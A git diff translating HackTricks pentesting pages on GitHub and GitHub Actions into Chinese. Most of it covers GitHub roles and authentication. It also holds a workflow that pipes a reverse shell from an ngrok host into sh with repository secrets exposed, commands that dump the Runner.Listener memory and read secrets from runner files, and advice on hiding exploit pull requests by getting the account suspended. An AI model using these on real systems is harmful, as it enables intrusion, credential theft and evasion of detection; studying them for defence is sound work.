-Get reverse shell with secrets - +通过秘密获取反向 shell ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible. - - ```bash - cat /home/runner/work/_temp/* - ``` -- For a JavaScript actions the secrets and sent through environment variables - - ```bash - ps axe | grep node - ``` -- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**: +- 如果秘密**直接在表达式中使用**,生成的 shell 脚本将存储在**磁盘上**并可访问。 +- ```bash +cat /home/runner/work/_temp/* +``` +- 对于 JavaScript actions,秘密通过环境变量发送 +- ```bash +ps axe | grep node +``` +- 对于**自定义操作**,风险可能会有所不同,具体取决于程序如何使用从**参数**中获得的秘密: - ```yaml - uses: fakeaction/publish@v3 - with: - key: ${{ secrets.PUBLISH_KEY }} - ``` +```yaml +uses: fakeaction/publish@v3 +with: +key: ${{ secrets.PUBLISH_KEY }} +``` -### Abusing Self-hosted runners +### 滥用自托管运行器 -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml. +查找**在非 GitHub 基础设施中执行的 GitHub Actions**的方法是搜索 GitHub Action 配置 yaml 中的**`runs-on: self-hosted`**。 -**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one. - -In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory: +**自托管**运行器可能访问**额外的敏感信息**,访问其他**网络系统**(网络中的脆弱端点?元数据服务?)或者,即使它是隔离和销毁的,**可能会同时运行多个操作**,恶意操作可能会**窃取其他操作的秘密**。 +在自托管运行器中,还可以通过转储其内存来获取**来自 \_Runner.Listener**\_\*\* 进程\*\* 的**秘密**,该进程将在任何步骤中包含工作流的所有秘密: ```bash sudo apt-get install -y gdb sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')" ``` +检查[**此帖子以获取更多信息**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/)。 -Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/). +### Github Docker 镜像注册表 -### Github Docker Images Registry - -It's possible to make Github actions that will **build and store a Docker image inside Github**.\ -An example can be find in the following expandable: +可以创建 Github actions 来 **在 Github 内部构建和存储 Docker 镜像**。\ +以下可找到一个示例:
-Github Action Build & Push Docker Image
-
+Github Action 构建 & 推送 Docker 镜像
```yaml
[...]
  - name: Set up Docker Buildx
    uses: docker/setup-buildx-action@v1

  - name: Login to GitHub Container Registry
    uses: docker/login-action@v1
    with:
      registry: ghcr.io
      username: ${{ github.repository_owner }}
      password: ${{ secrets.ACTIONS_TOKEN }}

  - name: Add Github Token to Dockerfile to be able to download code
    run: |
      sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile

  - name: Build and push
    uses: docker/build-push-action@v2
    with:
      context: .
      push: true
      tags: |
        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
[...]
```
-
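Because the workflow above `sed`s `secrets.ACTIONS_TOKEN` straight into the Dockerfile, the token may survive in the image metadata or layers. A rough sketch of hunting for it once the image has been pulled (as shown just below) — owner/repo are placeholders and the `gh[pousr]_` regex is only a heuristic for common GitHub token prefixes:

```bash
# Check the build history and then the raw layer contents for the token
docker history --no-trunc ghcr.io/<owner>/<repo>:latest | grep -iE 'token|secret'
docker save ghcr.io/<owner>/<repo>:latest -o image.tar
mkdir -p layers && tar -xf image.tar -C layers
grep -raEo 'gh[pousr]_[A-Za-z0-9]{20,}' layers/ | sort -u
```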
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**. - -A user with read permissions over the repo will then be able to download the Docker Image using a personal access token: +正如您在之前的代码中看到的,Github 注册表托管在 **`ghcr.io`**。 +具有对该仓库的读取权限的用户将能够使用个人访问令牌下载 Docker 镜像: ```bash echo $gh_token | docker login ghcr.io -u --password-stdin docker pull ghcr.io//: ``` - -Then, the user could search for **leaked secrets in the Docker image layers:** +然后,用户可以搜索 **Docker 镜像层中的泄露秘密:** {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics {{#endref}} -### Sensitive info in Github Actions logs +### Github Actions 日志中的敏感信息 -Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret). +即使 **Github** 尝试 **检测日志中的秘密值** 并 **避免显示** 它们,**其他敏感数据** 在执行操作时生成的内容仍然不会被隐藏。例如,使用秘密值签名的 JWT 除非 [特别配置](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret),否则不会被隐藏。 -## Covering your Tracks +## 掩盖你的痕迹 -(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR) +(技术来自 [**这里**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit))首先,任何提出的 PR 在 Github 上对公众和目标 GitHub 账户都是明显可见的。在 GitHub 中,默认情况下,我们 **无法删除互联网上的 PR**,但有一个变数。对于被 Github **暂停** 的 GitHub 账户,所有的 **PR 会被自动删除** 并从互联网上移除。因此,为了隐藏你的活动,你需要让你的 **GitHub 账户被暂停或被标记**。这将 **隐藏你在 GitHub 上的所有活动**(基本上移除你所有的利用 PR) -An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github. +GitHub 中的一个组织非常积极地向 GitHub 举报账户。你所需要做的就是在 Issue 中分享“某些东西”,他们会确保你的账户在 12 小时内被暂停 :p 这样,你的利用在 GitHub 上就变得不可见了。 > [!WARNING] -> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. 
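From the defender's point of view, a hedged sketch of what that log review could look like through the organization audit-log API (GitHub Enterprise Cloud only; the org name is a placeholder and the `action:` qualifier shown is an assumption — adjust it to the event names your plan actually exposes):

```bash
# Pull recent pull-request related events from the org audit log
gh api "/orgs/<ORG>/audit-log?phrase=action:pull_request.create&per_page=100" --paginate
```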
+> 组织发现自己被针对的唯一方法是通过 SIEM 检查 GitHub 日志,因为从 GitHub UI 中 PR 会被移除。 -## Tools +## 工具 -The following tools are useful to find Github Action workflows and even find vulnerable ones: +以下工具对于查找 GitHub Action 工作流甚至查找易受攻击的工作流非常有用: - [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven) - [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato) @@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul - [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md index ae156de2d..59da712ac 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md @@ -1,6 +1 @@ # Gh Actions - Artifact Poisoning - - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md index 024aa5ff8..489446262 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md @@ -1,6 +1 @@ -# GH Actions - Cache Poisoning - - - - - +# GH Actions - 缓存中毒 diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md index 3cd632bd0..7504dd8ff 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -1,6 +1 @@ -# Gh Actions - Context Script Injections - - - - - +# Gh Actions - 上下文脚本注入 diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md index f19fa699e..699952c62 100644 --- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md +++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md @@ -2,59 +2,55 @@ {{#include ../../banners/hacktricks-training.md}} -This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). +这种访问被认为已删除的Github数据的方法在[**这篇博客文章中报告**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)。 ## Accessing Deleted Fork Data -1. You fork a public repository -2. You commit code to your fork -3. You delete your fork +1. 你fork一个公共仓库 +2. 你向你的fork提交代码 +3. 你删除你的fork > [!CAUTION] -> The data commited in the deleted fork is still accessible. +> 在已删除的fork中提交的数据仍然可以访问。 ## Accessing Deleted Repo Data -1. You have a public repo on GitHub. -2. A user forks your repo. -3. You commit data after they fork it (and they never sync their fork with your updates). -4. You delete the entire repo. +1. 你在GitHub上有一个公共仓库。 +2. 一个用户fork了你的仓库。 +3. 你在他们fork之后提交数据(而他们从未将他们的fork与您的更新同步)。 +4. 
你删除整个仓库。 > [!CAUTION] -> Even if you deleted your repo, all the changes made to it are still accessible through the forks. +> 即使你删除了你的仓库,对其所做的所有更改仍然可以通过fork访问。 ## Accessing Private Repo Data -1. You create a private repo that will eventually be made public. -2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. -3. You make your “upstream” repository public and keep your fork private. +1. 你创建一个最终会公开的私有仓库。 +2. 你创建该仓库的私有内部版本(通过fork)并提交额外的代码用于你不打算公开的功能。 +3. 你将你的“上游”仓库设为公开,并保持你的fork为私有。 > [!CAUTION] -> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. +> 在内部fork创建和公共版本公开之间的时间内,可以访问推送到内部fork的所有数据。 ## How to discover commits from deleted/hidden forks -The same blog post propose 2 options: +同一篇博客文章提出了两个选项: ### Directly accessing the commit -If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` +如果已知提交ID(sha-1)值,可以在`https://github.com///commit/`中访问它。 ### Brute-forcing short SHA-1 values -It's the same to access both of these: +访问这两者是相同的: - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) -And the latest one use a short sha-1 that is bruteforceable. +而最新的一个使用了一个可以暴力破解的短sha-1。 ## References - [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md index ae1365a0f..bfeafcf88 100644 --- a/src/pentesting-ci-cd/github-security/basic-github-information.md +++ b/src/pentesting-ci-cd/github-security/basic-github-information.md @@ -1,248 +1,241 @@ -# Basic Github Information +# 基本的 Github 信息 {{#include ../../banners/hacktricks-training.md}} -## Basic Structure +## 基本结构 -The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. +大型 **公司** 的基本 github 环境结构是拥有一个 **企业**,该企业拥有 **多个组织**,每个组织可能包含 **多个代码库** 和 **多个团队**。较小的公司可能只 **拥有一个组织而没有企业**。 -From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**. +从用户的角度来看,**用户** 可以是 **不同企业和组织的成员**。在这些组织中,用户可能拥有 **不同的企业、组织和代码库角色**。 -Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles. +此外,用户可能是 **不同团队的一部分**,并拥有不同的企业、组织或代码库角色。 -And finally **repositories may have special protection mechanisms**. +最后,**代码库可能具有特殊的保护机制**。 -## Privileges +## 权限 -### Enterprise Roles +### 企业角色 -- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. 
However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository -- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. +- **企业所有者**:拥有此角色的人可以 **管理管理员、管理企业内的组织、管理企业设置、在组织间强制执行政策**。但是,他们 **无法访问组织设置或内容**,除非他们被指定为组织所有者或获得对组织拥有的代码库的直接访问权限。 +- **企业成员**:由您的企业拥有的组织的成员也 **自动成为企业成员**。 -### Organization Roles +### 组织角色 -In an organisation users can have different roles: +在组织中,用户可以拥有不同的角色: -- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization. -- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. -- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. -- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. -- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. -- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. +- **组织所有者**:组织所有者对您的组织拥有 **完全的管理访问权限**。此角色应限制,但不应少于两人。 +- **组织成员**:在 **组织中的人** 的默认非管理角色是组织成员。默认情况下,组织成员 **拥有一定数量的权限**。 +- **账单管理员**:账单管理员是可以 **管理您组织的账单设置** 的用户,例如支付信息。 +- **安全管理员**:这是组织所有者可以分配给组织中任何团队的角色。应用后,它赋予团队的每个成员权限,以 **管理组织内的安全警报和设置,以及对所有代码库的读取权限**。 +- 如果您的组织有安全团队,您可以使用安全管理员角色为团队成员提供他们所需的最低访问权限。 +- **Github 应用管理员**:为了允许其他用户 **管理组织拥有的 GitHub 应用**,所有者可以授予他们 GitHub 应用管理员权限。 +- **外部协作者**:外部协作者是指 **可以访问一个或多个组织代码库但不是组织的明确成员** 的人。 -You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) +您可以在此表中 **比较这些角色的权限**:[https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) -### Members Privileges +### 成员权限 -In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**. +在 _https://github.com/organizations/\/settings/member_privileges_ 中,您可以查看 **用户仅因成为组织的一部分而拥有的权限**。 -The settings here configured will indicate the following permissions of members of the organisation: +此处配置的设置将指示组织成员的以下权限: -- Be admin, writer, reader or no permission over all the organisation repos. 
-- If members can create private, internal or public repositories. -- If forking of repositories is possible -- If it's possible to invite outside collaborators -- If public or private sites can be published -- The permissions admins has over the repositories -- If members can create new teams +- 对所有组织代码库拥有管理员、写入、读取或无权限。 +- 成员是否可以创建私有、内部或公共代码库。 +- 是否可以对代码库进行分叉。 +- 是否可以邀请外部协作者。 +- 是否可以发布公共或私有网站。 +- 管理员对代码库的权限。 +- 成员是否可以创建新团队。 -### Repository Roles +### 代码库角色 -By default repository roles are created: +默认情况下,创建的代码库角色有: -- **Read**: Recommended for **non-code contributors** who want to view or discuss your project -- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access -- **Write**: Recommended for contributors who **actively push to your project** -- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions -- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository +- **读取**:推荐给 **非代码贡献者**,希望查看或讨论您的项目。 +- **分类**:推荐给 **需要主动管理问题和拉取请求的贡献者**,但没有写入权限。 +- **写入**:推荐给 **积极推送到您的项目的贡献者**。 +- **维护**:推荐给 **需要管理代码库的项目经理**,但不需要访问敏感或破坏性操作。 +- **管理员**:推荐给需要 **对项目拥有完全访问权限** 的人,包括管理安全或删除代码库等敏感和破坏性操作。 -You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) +您可以在此表中 **比较每个角色的权限**:[https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) -You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ +您还可以在 _https://github.com/organizations/\/settings/roles_ 中 **创建自己的角色**。 -### Teams +### 团队 -You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. +您可以在 _https://github.com/orgs/\/teams_ 中 **列出组织中创建的团队**。请注意,要查看其他团队的子团队,您需要访问每个父团队。 -### Users +### 用户 -The users of an organization can be **listed** in _https://github.com/orgs/\/people._ +组织的用户可以在 _https://github.com/orgs/\/people_ 中 **列出**。 -In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. +在每个用户的信息中,您可以看到 **用户是哪个团队的成员**,以及 **用户可以访问的代码库**。 -## Github Authentication +## Github 认证 -Github offers different ways to authenticate to your account and perform actions on your behalf. +Github 提供不同的方式来验证您的帐户并代表您执行操作。 -### Web Access +### 网络访问 -Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). 
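The member, team and repository listings mentioned above can also be pulled through the REST API once any valid token is available — a quick sketch with a placeholder org name:

```bash
gh api /orgs/<ORG>/members --paginate -q '.[].login'
gh api /orgs/<ORG>/teams   --paginate -q '.[].slug'
gh api /orgs/<ORG>/repos   --paginate -q '.[].full_name'
```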
+访问 **github.com**,您可以使用 **用户名和密码**(以及 **可能的 2FA**)登录。 -### **SSH Keys** +### **SSH 密钥** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) +您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作**。[https://github.com/settings/keys](https://github.com/settings/keys) -#### **GPG Keys** +#### **GPG 密钥** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). +您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **在没有签名的情况下发送提交时被发现**。了解更多关于 [警惕模式的信息](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode)。 -### **Personal Access Tokens** +### **个人访问令牌** -You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens) +您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。创建个人访问令牌时,**用户** 需要 **指定** 令牌将拥有的 **权限**。[https://github.com/settings/tokens](https://github.com/settings/tokens) -### Oauth Applications +### Oauth 应用 -Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. +Oauth 应用可能会请求您 **访问部分 GitHub 信息或冒充您** 执行某些操作。此功能的一个常见示例是您可能在某些平台上找到的 **使用 GitHub 登录按钮**。 -- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) -- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) -- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) -- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_ +- 您可以在 [https://github.com/settings/developers](https://github.com/settings/developers) 中 **创建** 您自己的 **Oauth 应用**。 +- 您可以在 [https://github.com/settings/applications](https://github.com/settings/applications) 中查看所有 **访问您帐户的 Oauth 应用**。 +- 您可以在 [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) 中查看 **Oauth 应用可以请求的范围**。 +- 您可以在 _https://github.com/organizations/\/settings/oauth_application_policy_ 中查看组织中应用程序的第三方访问。 -Some **security recommendations**: +一些 **安全建议**: -- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. -- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. 
-- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. -- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. -- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). +- **OAuth 应用** 应始终 **作为经过身份验证的 GitHub 用户在 GitHub 的所有地方操作**(例如,在提供用户通知时),并仅访问指定的范围。 +- OAuth 应用可以通过为经过身份验证的用户启用“使用 GitHub 登录”作为身份提供者。 +- **不要** 构建一个 **OAuth 应用**,如果您希望您的应用程序在 **单个代码库** 上操作。使用 `repo` OAuth 范围,OAuth 应用可以 **在所有**\*\* 经过身份验证的用户的代码库上操作\*\*。 +- **不要** 构建一个 OAuth 应用来作为您 **团队或公司的** 应用程序。OAuth 应用作为 **单个用户** 进行身份验证,因此如果一个人创建了一个供公司使用的 OAuth 应用,然后他们离开公司,其他人将无法访问它。 +- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps)。 -### Github Applications +### Github 应用 -Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. +Github 应用可以请求权限以 **访问您的 GitHub 信息或冒充您** 执行特定操作。在 Github 应用中,您需要指定应用将访问的代码库。 -- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. -- The GitHub App should **connect to a personal account or an organisation**. -- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) -- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) -- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them -- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ +- 要安装 GitHub 应用,您必须是 **组织所有者或在代码库中拥有管理员权限**。 +- GitHub 应用应 **连接到个人帐户或组织**。 +- 您可以在 [https://github.com/settings/apps](https://github.com/settings/apps) 中创建自己的 GitHub 应用。 +- 您可以在 [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) 中查看所有 **访问您帐户的 GitHub 应用**。 +- 这些是 **GitHub 应用的 API 端点** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)。根据应用的权限,它将能够访问其中的一些。 +- 您可以在 _https://github.com/organizations/\/settings/installations_ 中查看组织中的已安装应用。 -Some security recommendations: +一些安全建议: -- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." 
-- Make sure the GitHub App integrates with **specific repositories**. -- The GitHub App should **connect to a personal account or an organisation**. -- Don't expect the GitHub App to know and do everything a user can. -- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. -- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. -- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." -- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). +- GitHub 应用应 **独立于用户采取行动**(除非应用使用 [用户到服务器](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) 令牌)。为了使用户到服务器的访问令牌更安全,您可以使用将在 8 小时后过期的访问令牌,以及可以交换为新访问令牌的刷新令牌。有关更多信息,请参见“[刷新用户到服务器的访问令牌](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)”。 +- 确保 GitHub 应用与 **特定代码库** 集成。 +- GitHub 应用应 **连接到个人帐户或组织**。 +- 不要期望 GitHub 应用知道并做用户可以做的所有事情。 +- **如果您只需要“使用 GitHub 登录”服务,请不要使用 GitHub 应用**。但是,GitHub 应用可以使用 [用户识别流程](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) 来登录用户 _并_ 执行其他操作。 +- 如果您使用应用与 GitHub Actions,并希望修改工作流文件,您必须代表用户使用包含 `workflow` 范围的 OAuth 令牌进行身份验证。用户必须对包含工作流文件的代码库具有管理员或写入权限。有关更多信息,请参见“[了解 OAuth 应用的范围](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)”。 +- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps)。 ### Github Actions -This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. +这 **不是在 GitHub 中进行身份验证的方法**,但一个 **恶意** 的 GitHub Action 可能会获得 **未经授权的访问 GitHub**,并且 **根据** 赋予 Action 的 **权限**,可能会进行几种 **不同的攻击**。有关更多信息,请参见下文。 -## Git Actions +## Git 操作 -Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). +Git 操作允许在事件发生时自动化 **代码的执行**。通常执行的代码与 **代码库的代码有某种关系**(可能构建一个 docker 容器或检查 PR 是否包含秘密)。 -### Configuration +### 配置 -In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. +在 _https://github.com/organizations/\/settings/actions_ 中,可以检查组织的 **GitHub Actions 配置**。 -It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. 
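If you hold a token with enough scope, the organization-level Actions settings described above — and the registered self-hosted runners — can be read through the REST API instead of the web UI. A sketch with placeholder names:

```bash
# Which Actions are allowed to run in the org
gh api /orgs/<ORG>/actions/permissions
gh api /orgs/<ORG>/actions/permissions/selected-actions  # only meaningful when allowed_actions == "selected"

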